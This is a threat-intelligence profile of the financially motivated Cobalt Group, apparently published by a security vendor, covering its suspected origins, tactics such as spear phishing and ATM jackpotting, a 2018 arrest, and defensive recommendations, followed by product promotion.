Threat Actor Profile
Cobalt Group
Cobalt Group, also known as Cobalt Gang, is a financially motivated cybercrime organization that emerged around 2016. Known for its sophisticated and large-scale attacks on banks, ATMs, and payment systems, this group pioneered modern ATM jackpotting operations. Closely associated with Carbanak and FIN7, Cobalt Group has stolen an estimated €1 billion globally through targeted financial attacks.
Threat Actor Profile
Cobalt Group
Country of Origin
Cobalt Group is widely believed to operate out of Eastern Europe or Russia. While definitive attribution is challenging, their activities and tactics suggest origins in regions with a substantial cybercrime presence and organized affiliate networks.
Members
The exact size of Cobalt Group is unknown, but it is believed to be composed of a core group of operators and an extensive network of affiliates and hired money mules. This structure enables them to operate on a global scale while maintaining operational cover.
Leadership
The leadership of Cobalt Group remains largely unidentified. However, Europol coordinated an arrest of a key suspect in Spain in 2018, believed to be a high-ranking member of the group. Despite this, activities linked to Cobalt appear to have continued, likely due to its decentralized affiliate structure.
Cobalt Group TTPs
Tactics
The Cobalt Group is focused on financial gain, employing methods such as ATM jackpotting, SWIFT system manipulation, and wire fraud. Their primary objective is the direct theft of funds from financial institutions.
Techniques
Cobalt Group leverages spear phishing campaigns to gain initial access, attaching malicious documents exploiting vulnerabilities in Microsoft Office. Once inside, they deploy custom malware like Cobalt Strike Beacon and Carbanak to establish persistence and escalate privileges within networks.
Procedures
Using tools like Mimikatz, PowerShell, and PsExec, the group moves laterally within compromised environments. To execute attacks, they manipulate SWIFT systems and remote ATMs, causing them to dispense cash in coordinated “cash-out” operations or transferring money to mule-controlled accounts. They leverage encrypted communications and anti-forensic techniques to hide their tracks.
Want to Shut Down Threats Before They Start?
Notable Cyberattacks
One of the group’s most infamous campaigns occurred between 2016 and 2018, involving ATM jackpotting operations that stole millions from banks across Eastern Europe and Asia. Another major breach involved the manipulation of SWIFT systems, enabling fraudulent wire transactions across multiple countries.
Law Enforcement & Arrests
A key leader of the Cobalt Group was arrested in Spain in 2018 through a Europol-coordinated operation. Despite this, the group’s activities have persisted sporadically, potentially carried out by splinter cells or affiliates.
How to Defend Against Cobalt Group
Email Security: Utilize advanced email filtering, sandboxing, and conduct employee security awareness training.
Regular Patch Management: Keep systems like Microsoft Office and Windows up to date to eliminate known vulnerabilities.
Network Segmentation: Isolate sensitive systems, including ATMs and SWIFT, from corporate networks.
Behavioral Monitoring: Implement tools to detect unusual patterns, such as lateral movement or unauthorized PowerShell activity.
Harden ATMs: Disable unnecessary admin tools and update endpoint protection software.
Huntress solutions help protect organizations by monitoring endpoints, detecting intrusions, and mitigating Fancy Bear threats withenterprise-grade technology.
References
Detect, Respond, Protect
See how the global Huntress SOC can augment your team
with 24/7 coverage and unmatched human expertise.
Start your free trial today.
